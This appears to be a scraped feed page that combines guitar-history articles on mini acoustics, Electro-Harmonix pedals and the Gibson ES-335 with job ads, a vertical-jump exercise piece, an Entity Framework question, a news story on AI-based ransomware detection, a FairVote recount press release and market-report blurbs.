    Schemmer Guitars and Listig Guitar did not seem to sound as marketable as Taylor Guitars. So Taylor Guitar it was. None of the men had studied Martin’s guitar making techniques, so their ideas were fresh and had a new approach. By 1983 Taylor and Listig bought out Schemmer’s stake in the company.

    1996 Baby Taylor (Baby on head stock)

    Back in 1996, at a time when most of us were interesting only in dreadnought sized guitars,  the Baby Taylor made its debut and starts a new trend in guitar manufacturing.

    Baby Taylor neck
    Taylor Guitars had already come up with an interesting concept in its bolt-on neck, which utilized precision cut spacers and bolts to attach the neck to the guitars body, which made neck adjustments quick and painless and this same process was applied to the Baby Taylor.

    The instruments heelless neck attaches to the guitars body by means of two screws that are flush with the fretboard and located between the 15th and 16th fret.

    Baby Taylor arched back
    The guitars back and sides are made of 3 layers of laminated sapele wood and the instruments back is slightly arched. Other guitar companies, such as Guild, Framus, and Gibson, have used this same method of arching the back through heated pressing for strength, so the back requires no internal back bracing.

    The guitars top is made of solid Sitka spruce. Black matte veneer covers the headstock that bears the decal with the Taylor logo.

    The guitar comes with its own gig bag.

    Taylor Swift Baby Taylor

    The Baby Taylor has a 22 3/4” scale on its diminutive 15 3/4” by 12 1/2” body. The guitar was an instant hit and notice was taken by many other guitar manufacturers. The first year offered the Baby Taylor sold over 1,000 units. Sales of the tiny guitar increased from there.

    Martin guitars offered the Backpacker around 1993. Chris Martin IV had visited luthier Robert McNally’s booth at the 1993 NAMM convention where the luthier was displaying his 3 string Strumstick.

    Bob McNally with a Strumstick
    The original instrument was based on the mountain lap dulcimer, but was meant to be played like a guitar. A deal was struck up at this show for 5,000 units to be made. The neck was changed to a six string guitar design and it was dubbed The Backpacker.

    1995 Martin Backpacker

    Although the guitar did not have the greatest tone or volume, its compact size, and durability made it successful. The Backpacker was even taken into outer space by one of the astronauts.

    Martin 5-15 & Backpacker

    The design changed in 2002 when the instruments body was enlarged to enhance the tone and make the instrument easier to hold. Martin has also offered this same instrument with nylon strings, and a mandolin, and ukulele version.

    Martin LXM
    In 2003 Martin took the concept of a small guitar a step further a with the introduction of the Martin LXM. The LXM or Little Martin is designed as a modified 0-14 fret tenor Martin shape. The scale is 23’ in length. The entire guitar is constructed of high-pressure-laminate or HPL, which is essentially the same process used for making Formica. The neck on the Little Martin is made of Rust birch laminate. The fretboard is constructed of black Micarta, while the nut is made of white Corian. The saddle is made of white Tusq. The tuners are made by Gotoh.

    Martin LXME

    The original version was only offered as an acoustic instrument. Later on the LXME came with Fishman transducers and Mini Q electronics. The LXM models all come with a gig bag.

    Martin LX1

    The Martin LX1 is the same style of guitar, but it has a solid Sitka spruce top.

    LX1E Ed Sheeran model

    Ed Sheeran began his busking career using a Little Martin and Martin guitars offers the Ed Sheeran X signature series LX size guitar with built-in Fishman Isys T electronics.

    Martin LX1e

    Martin also makes the LX1e electric acoustic models, which feature a solid spruce top.

    2013 Taylor GS Mini
    In July of 2013 Taylor Guitars introduced the GS Mini guitar. After experimenting with changes to the Baby Taylor, a new design, the Grand Symphony, was decided on. The GS has a different body shape and different bracing.

    The top is made of solid Sitka spruce and the back and sides are sapele laminate. The body is approximately 2” larger than the Baby Taylor. The scale is 23 1/2”, and the body is an inch deeper than the Baby Taylor. Once again, it features the arched back design.

    Taylor GS Mini E

    The neck on this model, although a bolt-on featuring Taylor’s NT design, does have a heel. The action is low and feels quite good. The original models were only offered as acoustic guitars, but could be equipped with the optional ES-Go acoustic pickup.

    ES-Go Pickup System

    This unit is built exclusively for the GS Mini guitar. The ES-Go is stacked humbucking magnetic pickup which clips onto a bracket in the sound hole that is underneath the fretboard section. Once in place, the player swaps out the end pin and replace it with the one attached to the ES-Go unit. It is made to be paired with Taylor’s “V” cable, which has a volume control. The unit sells for an additional $100.

    Taylor GS Mini Mahogany-Spruce

    Since its inception, Taylor has improved this guitar, by offering it with optional body woods, such as a mahogany top or spruce top with laminated walnut back and sides. The electronics have also been updated.

    2015 Taylor GS Mini E
    The Taylor GS mini e is now is available with a built-in Taylor Expression System 2 electronics, which places 3 pickup sensors behind the guitars bridge. Taylor feels this is superior to under the under the saddle method that many designers have used. This also comes with a built-in preamp.

    This option adds $100 to the guitars price, but eliminates the need for putting on or removing the ES-Go unit.

    Back in 1997, just a year after Bob Taylor introduced the Baby Taylor, Tacoma Guitars of Seattle Washington introduced The Papoose mini guitar.

    The Tacoma Factory - Frets magazine
    Tacoma Guitars was a division of The Tacoma Lumber Company.  In 1991 this company was processing hardwood that was milled into piano soundboards exclusively for the Young Chang Piano Company of South Korea.

    The lumber company's general manager, J.C. Kim persuaded Young Change to build a guitar manufacturing plant nearby, and the company started turning out some rather unique instruments. Among these was the tiny P1 Papoose guitar that was designed by luthier Terry Atkins and George Gruhn.

    1997 Tacoma Papoose

    The Tacoma P1 Papoose had a short scale neck with only a 19.1” scale, and  it was built to be tuned a fourth higher that normal guitar tuning. In other words, the strings were tuned from A to A.

    Paisley Soundhole on Papoose
    This guitar introduced the Paisley sound hole, which became a Tacoma trademark, and the Voiced Bracing Support system. This was a system designed to minimize the bracing as much as possible down to what the instrument needs to remain stable.

    Back of 1997 Papoose

    The heelless neck on the Papoose was bolted on and secured by two screws. The bridge was uniquely shaped and had 3 unusual C-shaped cut-outs to secure the strings. Some later models came with bridge pins.

    Papoose 12 String
    The Papoose was available in a variety of sound board woods. Tacoma also came out with the P112 Papoose 12 string. Towards the end of the line, Tacoma had introduced and electric version of The Papoose.

    Young Chang put the company up for sale in 1999 and it was sold to Fender Musical Instruments Corporation in 2004.

    Sadly in 2008 Fender closed the plant and laid off the staff. Though the Papoose is no longer produced, it can still be found on auction sites at a fairly reasonable rate.

    Since the Baby Taylor and the Little Martin have proved to be successful, many major guitar manufacturers, too numerous to mention, have developed and offer 3/4 sized mini acoustic guitars in their line up.

    Dean Flight

    Among them Dean Guitars offers the Dean Flight that retails for around $150 USD. It is a laminated guitar with a 22” scale. The neck is mahogany, and the headstock is done in the Dean-wing style. It comes with a gig bag.

    Fender MA-1
    Fender offers the MA-1 Parlor 3/4 size guitar. The top is laminated Agathis and the back and sides are laminated Sapele. As with most of the mini acoustic guitars a gig bag is included.

    Yamaha JR1

    Yamaha’s product is the JR1 Mini Folk.

    Luna Safari

    Luna Guitars offers a similar 3/4 sized guitar called the Muse Safari guitar.

    Takamine GX18CE-NS

    Takamine has the GX18CE-NS, which retails around $400, but it does have a solid spruce top, rosewood fretboard and electronics with a built-in preamp.

    KLOS Mini guitar

    One of the more unique mini guitars comes from a company called Klos. Their instrument has a carbon fiber body. The neck is made of mahogany and topped with a rosewood fretboard.

    KLOS Mini guitar
    Despite being small in size, the scale is 24 3/4”. Plus the neck is removable. It comes with a gig bag and sell direct from the manufacturer for around $600 USD.

              Electro-Harmonix Effects Pedals; A Brief History   
    Electro-Harmonix original logo
    For electric guitarists it is not enough to have your instrument sound like a guitar; We leave that to the jazz players, the classical players, and the folkies. Electric players want to make their instrument growl, wail, and and scream.

    Guitar George

    We are not like “Guitar George, he knows all the chords. Mind he’s strictly rhythm he doesn’t want to make them cry or sing.” The majority of us want to express ourselves and be heard.

    Maestro Fuzztone
    Aside from a loud, over driven amplifier, effects pedals are necessary tools for most guitarists and bass players. The granddaddy of them all was the Maestro Fuzztone. This was the original pedal used on the Rolling Stone’s hit song, Satisfaction, and it started a whole industry.

    One of the original and most prominent manufacturers of guitar and bass effects pedal is Electro-Harmonix. This company emerged on the scene in New York City back in 1968.

    Mike Matthews in 1979

    Back in 1967 Mike Matthews, the companies owner and founder was a rhythm and blues piano player and had a day time sales job. His friend, Bill Berko, was an audio repairman who had just constructed a circuit for a guitar fuzz pedal.

    '67 Axis and Foxey Lady fuzz pedals

    Under the advice of Matthews, Berko hired a company to construct these pedals under a deal with the Guild Guitar Company and the device was given the name of the Axis fuzz pedal. It was also sold under the name Foxey Lady.

    All parties made a little money off the deal, and eventually Berko and Matthews parted ways.

    Mike Matthews 1967
    However Mike Matthews was smitten with the idea of creating guitar effects. As I've mentioned, at the time Matthews was a salesman for IBM and he next teamed up with an IBM colleague who was an electrical engineer by the name of Bob Myer.

    In 1969 they worked together to create a distortion free sustain device. Some fuzz tones of that era produced a buzz saw like effect that produced some sustain, while others like the Maestro box, just added gain to distort the guitars signal. Guitarists at that time wanted the ability for notes to be played and held, just like those played by horn players.

    Original LPB-1
    What Myer and Matthews came up with was a small device the Linear Power Booster, and called it the LPB-1. This pedal boosted the signal and made the guitar stand out. It did not sit on the floor, but was made to be plugged directly into the amplifier input.

    Vintage LPB-1 interior

    The price for this unit was about $20 USD, and it was an instant hit. The original units were hand wired with no circuit board.

    1969-70 version Big Muff Pi (π)
    The next effect that Matthews and Bob Myer created was the a fuzz tone that added a low end heavy sustain to any guitar sound. They gave it the name of The Big Muff Pi. It mixed harmonic distortion, sustain, and fuzz sounds together to make even a small amplifier sound huge. Plus it distorted at any volume. Both devices were instant hits and were put to use by well known artists.

    '75 Big Muff Pi (π) interior
    The original version of the Big Muff Pi was pretty much hand-made on perforated electronic boards with the wiring and parts hand-soldiered. But by 1970 these devices were updated to etched PCB boards.

    Double Muff and Little Muff
    The Big Muff was such a hit that subsequent versions emerged in later years, such as the Metal Muff, which had a higher gain threshold, and the Double Muff, which was two Big Muffs wired in series that offered overdrive through a single circuit, or through a cascaded version.

    The Little Big Muff was a smaller version of the unit and had a slight variation in the circuit. The NYC Big Muff came with a tone bypass switch that allowed the user to bypass the tone control and another switch the adjusted the frequencies of 3 filters embedded in the circuit.

    EH Bass and Treble boost

    There were several other devices made by Electro-Harmonix in the late 1960's and early 1970's that included a Treble Booster, called the Screaming Bird and a Bass Booster called the Mole, that were made in a similar format to the LPB-1; These small boxes had an input on one end to accept the guitar cable and a plug on the opposite side that went into the amplifier. These units originally sold for around $20 USD.

    EH Slap Back Echo

    The company also produced the Slap-Back Echo box that produced a slap-back effect and came with a filter switch to shape the tone.

    1975 EH Small Stone Phaser
    One of the more popular effects the company produced at this time was the Small Stone Phase Shifter. It was a 4 stage phasing circuit, design by David Cockerell. This device had one large knob to adjust the rate of phasing and a slider switch labeled “Color” that engaged an additional stage of feedback for a more pronounced sound. Think of the Doobie Brothers song “Listen to the Music”.

    EH Band Stone Phase Shifter

    The Bad Stone Phase Shifter was an upgraded circuit that added a Feedback control and a Manual Shift control to filter the sweet spot.

    '77 EH Octave Multiplexer

    Electro-Harmonix came out with an octave box called the Octave Multiplexer which produced the clean signal and a filtered signal an octave below.

    EH Elecric Mistress Flanger

    The Electric Mistress Flanger Chorus Pedal came out in the mid 1970’s and was one of the first multi-effects devices.

    Mid 70's EH Attack Equalizer

    The Electro-Harmonix Attack Equalizer pedal was a combination of a parametric EQ to produce desired equalization and a pre-amplifier to boost the guitars signal.

    1981 EH Graphic Fuzz

    The Electro-Harmonix Graphic Fuzz was not only a fuzztone/distortion unit, but it added a six band graphic eq control section.

    1980 EH Full Double Tracking Effect
    The Full Double Tracking Effect, split the guitars signal. One signal was given a slight delay that was adjustable, while the other was the original guitar signal. It came with a switch that allowed the delay to be 50 ms or 100 ms. The knob adjusted the mix of the original and filtered signals.

    '77 EH Triggered Y Filter

    The Triggered Y Filter was sort of a phaser unit that allowed the frequency range to be adjusted to Lo or Hi and the amplitude/depth of the filter sweep.

    Late '70's EH Echoflanger

    The Echo Flanger produced a modulated Echo and a flanging effect, similar to what record producer did when they would press their finger or thumb on recording tape to cause the one of the tracks to be slightly delayed.

    1978 EH Memory Man

    The Electro-Harmonix Memory Man, was introduced in 1978 and produced analog delay and echo using “bucket brigage” integrated circuits and incorporated a chorus effect. So the user could choose echo or chorus

    EH Deluxe Memory Man

    Several models of this effect including a stereo version and the Deluxe Memory Man that added a chorus/vibrato feature to the echo.

    EH Small Clone Chorus

    The Small Clone chorus, introduced by EHX around 1981 remains a very popular chorus pedal. it was also produced in two different smaller versions known as the Neo Clone and the Nano Clone.

    EH Holy Grail Reverb

    Electro-Harmonix issued a very popular reverb pedal called The Holy Grail.  This pedal came in several different formats including The Holy Grail Plus and the Cathedral. The Holy Stain was a multi-effects pedal that offered two different types of reverb.

    EH Wigger 

    Tremolo was one of the very earliest guitar effects and Electro-Harmonix offered a solid-state tremolo/vibrato pedal called the Stereo Pulsar and a tube based model called the Wiggler.

    1972 Mike Matthews Freedom Amp
    In 1972 the company came out with The Mike Matthews Freedom Amp. This DC powered amp put out around 25 watts RMS into a 10” speaker and was wired point-to-point. The controls included Volume, Tone, and Bite. The housing was rugged and built to be carried around. It was possibly the first battery powered amplifier.

    Interior of Freedom Amp with battery clips

    The only drawback was that it took 40 D cell batteries to power the thing.  It was also available as a bass model or as a public address amplifier which came with built in reverb.

    '90's EH Freedom Amp
    An updated 1990's version of this amplifier was later produced with a lower wattage but in an all wood cabinet. This version came with a wall adapter and a rechargeable battery.

    By 1982 Electro-Harmonix was facing a multiplicity of problems. First there was a labour union dispute. And about the same time the company filed for bankruptcy protection. Two years later, in 1984 Electro-Harmonix was in deeper financial problems and Mike Matthew decided to shift his attention away from the little effects boxes to a new venture.

    Mike Matthews

    He launched a new company that he called the New Sensor Corporation, which was based in the Soviet Union. Matthew saw the need for vacuum tubes, which were no longer being manufactured in the United States and in short supply, but were plentiful in the USSR.

    Sovtek Tubes
    Matthews put together factories in three Russian cities to produce Sovtek tubes and eventually became one of the largest suppliers of vacuum tubes in the world. To this day they still offer a variety of the most popular tubes used in modern amplifiers.

    Sovtek Mig 50 amplifier
    At the time the company went on to produce several tube amplifiers under the Sovtek brand name that included the Mig 50, the Sovtek Mig 60, and the Sovtek Mig 100, were all named after Russian fighter jets.

    These amps were based on popular circuits and can still be found on the web at bargain prices.

    New Sensor EH Russian made Big Muff Pi

    In 1990 Electro-Harmonix resumed the building effect pedals. Some of these were made in Russia through 2009.

    EH 2006 Nano Pedals

    In 2006 the smaller and more standardized "micro" and "nano" effect lines using surface-mount circuit components were introduced.

    The circuit board manufacturing was outsourced, but the final assembly of the pedals was done in New York.

    Vintage EH Micro Synthesizer

    When synthesizers came into vogue, EH offered the Micro Synthesizer for guitar or bass and the HOG effects unit; Harmonic Octave Generator.

    An original EH POG

    The POG or Polyphonic Octave Generator was released in 2005 and an enhanced version called the POG 2 came out in 2009. These units allowed your instrument to produce notes 2 octaves up and one octave below the guitars signal.

    EH 22 Caliber Amplifier

    Two of the more interesting and modern Electro-Harmonix creations may look like effects pedals, but are actually amplifiers housed in pedal sized effects box. The EHX 22 Caliber was a 22 watt solid-state amplifer capable of driving an 8 or 16 ohm speaker cabinet.

    EH 44 Magnum Amplifier

    It was discontinued and replaced by the EHX 44 Magnum, which could pump 44 solid-state watts into an 8 or 16 ohm speaker cabinet. These are small enough to pack into your guitar case. It is important to note, these units must be connected to a speaker load to work.

    Electro-Harmonix C9

    For 2016 and 2017 Electro-Harmonix has developed some amazing pedals that can coax organ or piano sounds from your guitar without the need for special pickups.

    Electro-Harmonix B9

    The C9 and B9 Organ Machines replicate the sounds of several different types of organs, from Hammond organs to church organs, to combo organs.

    Electro-Harmonix Key 9

    The Key 9 Electric Piano Machine produces a number of electric piano sounds. Combine any of these with the Lester G Deluxe Rotary Speaker emulator or the Lester K Rotary Speaker emulator and as a guitarist you now have all the tools of a keyboard player without the weight of hauling a B-3 and a Leslie cabinet.

    Electro-Harmonix Mel 9

    The Mel 9 Tape Replay Machine produces sounds from your guitar that were only possible with a Mellotron.

    A few of the Electro-Harmonix effects

    Electro-Harmonix now offers a line up that is far too numerous to mention every product. And these include not just guitar effects, but bass effects, drum effects and vocal effects.  And they have also updated versions of their original effects that sell at a much lower price than the vintage models.

    As a reminder, the sources for the pictures can be found by clicking on the links below them and the links in the text will take you to further interesting facts.
    ©UniqueGuitar Publishing (text only)

              The Gibson ES-335    
    Mark Knopfler's '58 ES-335
    The 1950’s were essential years in perfecting the design of the electric guitar. For Gibson Guitars, under the leadership of Ted McCarty, 1958 was a magical year. He and his team had come up with a series of futuristic solid body guitar designs, which included the Flying Vee, the Explorer and the elusive Moderne, but they also created one of the most original and iconic electric guitars of all time; The ES-335TD, or Electric Spanish model 335 Thin - Double Pickups. Or as it is more commonly known; the Gibson ES-335.

    1958 ES-335

    McCarty felt the ES-335 was right behind the Les Paul solid body as the companies most important body design. He stated, “I came up with the idea of putting a solid block of maple in an acoustic model. It would get some of the same tone as a regular solidbody, plus the instrument's hollow wings would vibrate and we'd get a combination of an electric solidbody and a hollow body guitar.”

    In 1952 Gibson had taken a chance on production of Les Paul’s concept of a solid body guitar which would eliminate the electronic feedback that was common to hollow body electric guitars when they were amplified loudly.

    Les Paul with The Log
    To prove this point, in 1941 Les Paul had created “The Log” which was a solid piece of 4 x 4 pine wood on to which he had attached an Epiphone Broadway guitar neck. Two single coil pickups were mounted to the wooden frame, along with a tailpiece to attach the strings. To make it appear to be a guitar, Paul had sawed the body of an Epiphone guitar in half and bolted the “wings” on either side of the pine plank. And that instrument did not feed back.

    A modern ES 335 with maple block

    This concept was essentially repeated with the Gibson ES-335. Its body had wings that were hollow shells of maple with F-holes over those chambers, but a significant maple block  separated the two sides and it was routed out to contain the pickups and anchor the neck.

    '48 L-5
    In the 1950’s Gibson had its feet staunchly planted in the hollow body guitar market manufacturing some of the finest electric and acoustic instruments. Up until the production of the ES-335, all the Gibson guitars with cutaways had only been manufactured with one either Venetian or Florentine cutaway, but never with two cutaways.

    '49 Bigsby Guitar

    Fender had been making its double cutaway Stratocaster since 1954. Surprisingly enough Paul Bigsby had built double cutaway guitars as early as 1949. And Bigsby’s guitars, though solid in appearance were actually hollow body instruments.

    '55 Mousegetar
    Now this may sound far fetched, but in the year 1958 one of the most popular television shows was The Mickey Mouse Club. Host Jimmy Dodd played a tenor guitar that Walt Disney commissioned to be produced by Candeles Guitars of East Los Angeles. Walt wanted that guitar to appear as if it had “mouse ears”. So the Mousegetar was built with double cutaways in 1955, three years before the ES-335. I have to wonder if this particular guitar inspired anyone in the Gibson design department.

    By 1958 Gibson had latched on to the double cutaway concept.

    An original 1958 Gibson ES-335 was given a suggested retail price of $335. Although in 1958 most were selling at around $267.50. By the way, in today's money $267.50 is equivalent to around $4,000 USD.

    1958 Gibson ES-335
    In 1958 the ES-335 body was 1 3/4” deep and had the usual Gibson scale of 24 3/4”. The top and back on the double cutaway body were made of laminated maple as was the center block. The body had single white binding around its perimeter. The neck was also made of laminated maple, for added strength and on original models, it was not bound and had a rather large feel to it. The fretboard was made of rosewood with pearl dot inlays.

    1958 ES-335 Neck view
    The original ES-335 guitars came with either a stop tail piece or a Bigsby B7 vibrato tail piece, which sometimes came with a sticker that said “CustomMade” to hide the routing holes for the stop bar. The bridge/saddle was a tune-o-matic model with adjustable nickel saddles.

    PAF Stricker from 1958 humbuckers
    This guitar came with twin PAF humbucking pickups and each had an individual volume and tone control in a gold finish with gold tops. Nearby was a three-way selector switch with an amber plastic top. The original models came with the long beveled pickguard. The strap button was made of plastic.

    This year the ES-335 was only available with a sunburst or natural finish.

    1959 ES-335 Cherry finish
    A year later the familiar cherry red finish was added as an option. This year binding was added to the neck. Some of the 1958 models had irregularities in the shape of the neck. By 1959, these issue were resolved. A 1959 ES-335 is considered to be a very desirable guitar to collectors.

    1960 ES-335

    A few changes occurred in 1960. This year the neck was given a thinner feel to the back shape. The volume/tone knobs have a chrome reflector top. The pickguard was shortened this year and does not extend past the bridge.

    1961 ES-335

    In 1961, Gibson discontinued the ES-335 with a natural finish. This year the strap button were changed to metal. The selector switch tip colour was gradually changed to white. Most notably the serial number was stamped into the back side of the head stock.

    1962 ES-335
    Big changes occurred in 1962. Instead of pearl dot inlaid fret markers, the markers were now small block inlays. The shape of the cutaways have a slight change in that they are now rounder instead of being more pointed. The saddles in the tune-o-matic bridge are now made of white nylon. Most of us will never see this, but the PAF sticker on the back of the humbucking pickups now shows the patent number.

    By 1963 the neck shape gradually got larger again.

    1965 Gibson ES-335 
    In 1965 Gibson changed the stop tailpiece to a chrome trapeze model. This may have been the most visible change. However the most dramatic change was the width of the neck at the nut. It changed from 1 11/16th” to 1 9/16th”.

    1966 ES-335

    By 1966 the Brazilian rosewood on the fretboard was changed to Indian rosewood. The neck angle decreased from 17 degrees to 14 degrees. The bevel of the pickguard was also changed making the black/white/black layers less noticeable.

    1968 Gibson ES-335

    By 1968 Gibson resumed making the nut and neck slightly wider by going back to the 1 11/16th” spacing.

    1969 ES-335 Walnut Finish

    It was not until 1969 that any more changes occurred. That year the guitar was offered with a walnut finish.

    1977 ES-335 with coil tap switch

    In 1977 Gibson, now owned by Norlin added a coil tap switch on the upper treble cutaway to keep up with the trends of the day.

    1981 ES-335DOT

    In 1981 the ES-335TDC was discontinued, but replaced with the ES-335DOT. These were made through 1985 and were very good guitars.

    1990 Gibson ES-335

    By 1990 the Gibson ES-335DOT was discontinued and replaced with the Gibson ES-335 reissue which remains in production.

    ES-335 Artist
    Through the years Gibson issued some variants on the ES-335 model including a 1981 model called the ES-335 Artist, or more properly, ES Artist, which came with a large headstock logo, no F-holes, a metal truss rod cover, gold hardware, and 3 knobs. The circuit inside the guitar was developed by Moog.

    1987 ES-335 CMT

    From 1983-1987 the ES-335 CMT was available. A very similar guitar to the ES-335DOT, but with a curly maple top and back and with gold hardware.

    1990 ES-335 Studio

    I recall the music store I used to spend time at had a Gibson ES-335 Studio model. It was Gibson’s effort to update and offer a lower price point. This guitar had no F-Holes, and came with twin Dirty Finger humbucking pickups. These were made from the mid 1980’s through 1991.

    1988 ES-335 Showcase Edition

    The Gibson ES-335 Showcase Edition lasted only a year. The hardware was black. It came with two EMG pickups. The guitar was either white or beige. Only 200 units were made in 1988.

    '94 ES-335 Centennial

    1994 gave us the Gibson ES-335 Centennial model to celebrate the company’s founding. This also was a limited edition of only 100 units. This guitar came with a gold medallion on the headstock and the tailpiece had diamond inlays.

    1998 ES-335 Historic '59

    Four years later Gibson came out with the ES-335 Historic Collection, which was a replica of their original 1959 ES-335.

    '85 ES-335 Nashville made
    By 1984 Gibson had moved all electric guitar production our of Kalamazoo, Michigan to Nashville, Tennessee. The ES-335 was then being made at the Nashville factory.

    However in 2000 Gibson opened a facility in Memphis, Tennessee. This is where ES-335’s are built today.

    Through the years following 1958, Gibson made other models that were either based on the model ES-335, such as ES-330, which was a hollow body guitar, or the ES-345 and ES-355, which had a broader tonal palette and were fancier guitars, and even the Trini Lopez Standard, which had a similar body, but different sound holes, inlays, and headstock, the ES-335 is the original starting point for all similar models.

    Click on the links in the photographs for their source. Click on links in the text for further information.

    © UniqueGuitar Publishing (for text only)

              Database Developer - MaRS Discovery District - Toronto, ON   
    Minimum 2 years’ experience developing ETL and data processes, ideally in Python including libraries such as Pandas, and json or other programming and data...
    From Indeed - Mon, 12 Jun 2017 17:02:59 GMT - View all Toronto, ON jobs
              The Vertical Project Exercises to Improve Your Vertical Jump   
    The Vertical Project

    People involved in sports, especially basketball, volleyball, soccer, and football, are often interested in finding ways to increase their vertical jump. There are many exercises and programs available that are specially designed for improving the vertical leap of a person. Before starting any of these programs though, you should at least be in good enough physical condition to start the program. Here we list a few exercises that you could start with before undertaking a training program. These will help get you started.
    Warm Ups

    Before starting the exercises, you need to warm up your muscles. Jog around for ten minutes or run up and down the stairs for a few minutes. Doing extensive leg stretches is another way to warm up the muscles. These simple exercises can help condition your body. Warming up before doing exercises helps you develop muscle fibers that are used for jumping.

    Skipping Rope

    Skipping rope is an exercise that should not be overlooked, as it will contribute in increasing the strength of your legs. Moreover, it helps maintain excellent cardiovascular condition. Do this exercise for fifteen to thirty minutes on a regular basis. Doing it early in the morning will give good results.

    Knee Raises

    Hold an overhead bar firmly, with your arms about shoulder-width apart. Hang from the overhead bar, with your arms fully extended and knees bent slightly. Hold this position and slowly raise your knees towards your chest. Squeeze your stomach muscles while doing this. Maintain the position of your knees for few seconds, before lowering your legs towards the floor. Repeat the process five times.

    Knee Bends

    One of the best ways to increase your leg strength is by bending the knees. Stand in an upright stance - straight, with chest out and keeping your back tight. Now, bend your knees slowly, keeping the back straight. Crouch, in a slow motion, to the maximum possible extent. Repeat this process 20 times.

    Toe Raises

    Stand straight. Now, raise your right leg in slow motion, until you can touch the tip of your toe with one hand. Pull down slowly and get back to the original position. Now, raise your left leg and repeat the process. Do this 30 times.


    Sit-ups will be very helpful in improving your vertical leap. However, if you want to have commendable leg strength, simple sit-ups will not be enough. Bring variation to this exercise by lying down on the floor with the back in a straight position. Now, lift the shoulders from the floor, in a slow motion. Do this exercise daily for ten minutes, in the morning and at night. Be careful to use proper form. If done incorrectly, you can hurt your back. You can also try "crunches" instead of sit-ups (or as a variation). Exercises for your waist are important for all physical activity as it is the "core" area of your body and your ultimate all around strength and flexibility start here.

    The vertical project enhances the results of all the above, enabling you to double your vertical leap.
    Tom Beagle is a writer for EInfohound. You can get more vertical jump tips and information on vertical jump programs on his blog at verticaljump.einfohound.com. This article is provided by Amazines.com - The ULTIMATE Article Database.
    For further information and a special deal on The Vertical Project see the Buy The Vertical Projectwebsite.
              Cannot create a DbSet for 'ApplicationUser' because this type is not included in the model for the context   

    I reverse-engineered my database with the scaffold command in the NuGet Package Manager Console (Scaffold-DbContext "[server info]" Microsoft.EntityFrameworkCore.SqlServer -OutputDir Models –Context AppDbContext) then deleted the Identity elements from the resulting context. The problem is, when I run the program and try to register or log in a user, I get the error in the subject line above. It doesn't make sense to manually put ApplicationUser in the context file (which I think is what the error is asking) since it's not a table. (I looked at some colleagues' projects and they don't have ApplicationUser in their contexts.) In the future, if I do a migration, it will create a table by the name of ApplicationUser. Any suggestions?

              Executive Assistant to the VP, Corporate Services - The Canadian Foundation for Healthcare Improvement - Canada   
    Excel, PowerPoint, Outlook, SharePoint, Skype for Business and advanced database. Technical/Specialized or Program....
    From The Canadian Foundation for Healthcare Improvement - Fri, 19 May 2017 00:12:44 GMT - View all Canada jobs
              How artificial intelligence is taking on ransomware   
    Twice in the space of six weeks, the world has faced major attacks of ransomware — malicious software that locks up photos and other files stored on your computer, then demands money to release them. Despite those risks, many people just aren’t good at updating security software. In the early days, identifying malicious programs such as viruses involved matching their code against a database of known malware. [...] a program that starts encrypting files without showing a progress bar on the screen could be flagged for surreptitious activity, said Fabian Wosar, chief technology officer at New Zealand security company Emsisoft. An even better approach identifies malware using observable characteristics usually associated with malicious intent — for instance, by quarantining a program disguised with a PDF icon to hide its true nature. For that, security researchers turn to machine learning, a form of artificial intelligence. The security system analyzes samples of good and bad software and figures out what combination of factors is likely to be present in malware. On the flip side, malware writers can obtain these security tools and tweak their code to see if they can evade detection. Some websites already offer to test software against leading security systems. Dmitri Alperovitch, co-founder and chief technology officer at Irvine vendor CrowdStrike, said that even if a particular system offers 99 percent protection, “it’s just a math problem of how many times you have to deviate your attack to get that 1 percent.” Though Cylance plans to release a consumer version in July, it says it’ll be a tough sell — at least until someone gets attacked personally or knows a friend or family member who has.

    FOR IMMEDIATE RELEASE                                                 

    Contact: Dania Korkor, Email: dkorkor@fairvote.org, Phone: (301) 270-4616

    The razor-thin margin of 0.01% in the race for second and a spot on the November ballot in the California controller race has highlighted California’s unique recount law and underscores the case for reform. FairVote’s research, data and analysis on statewide recounts across the country reveal that statewide recounts are exceptionally rare, outcomes reversals post-recounts are rarer and many state recount laws should be altered in multiple ways in order to be more efficient and effective.

    “The California recount is a rare statewide contest in which the recount could change the outcome,” said FairVote legal analyst Dania Korkor. “But the way it is being conducted underscores that California should adopt new laws to structure recounts. Right now, its recount law is among the worst in the nation.”

    Unlike 18 other states, California does not establish an automatic recount funded by taxpayers no matter how close the margin. Instead, it allows individual voters to initiate recounts by targeting specific counties, choosing the order in which the precincts are to be recounted, and being able to request to recount any of the remaining precincts for up to 24 hours after the initial recount. The voter pays a deposit before each day of the recount and if the voter’s candidate is ultimately declared the winner, the deposits are refunded. If the outcome were to change, other voters associated with the now-losing candidate could select additional jurisdictions for a recount, potentially triggering an expensive, litigious, controversial process of a recount see-saw.

    While other states allow partial recounts and/or payment dependent on the outcome, California is unique in using a picking and choosing of precincts method. Such a law can lead to dragged out recounts—Californians voted for controller over a month ago and the recount is ongoing—and potentially unfair outcomes due to “cherry-picked” recounts.

    Instead of California’s bizarre precarious system, FairVote proposes that California modernize its recount law. According to FairVote’s research of all statewide recounts occurring from 2000-2009 and updated review of recounts in 2010-2012, full statewide recounts are rarely necessary, as the average change in victory margin is less than 0.03%. But because accuracy in all elections is vital, FairVote recommends that states fund risk-limiting audits that can catch potential fraud or technological error in any race. The number of ballots to review should increase as the victory margin in a race decreases, and an election as close as the California controller race should trigger an automatic government-financed, statewide recount of all ballots. Finally, FairVote also recommends allowing presidential candidates to pay for an accelerated initial recount if the state does not find ways to get the count done quickly.

    For more details on FairVote’s research and recommendations, see our report. An updated version assessing recounts from 2000-2013 will be released shortly.


    FairVote is a nonpartisan, nonprofit organization that educates and enlivens discourse on how best to remove the structural barriers to a democracy that respects every voice and every vote in every election. For more information, contact FairVote legal analyst Dania Korkor at (301) 270-4616 or by email at dkorkor@fairvote.org.

              Global High Performance Plastics Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global High Performance Plastics Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

              Global High Chrome Steel Grinding Media Balls Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global High Chrome Steel Grinding Media Balls Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

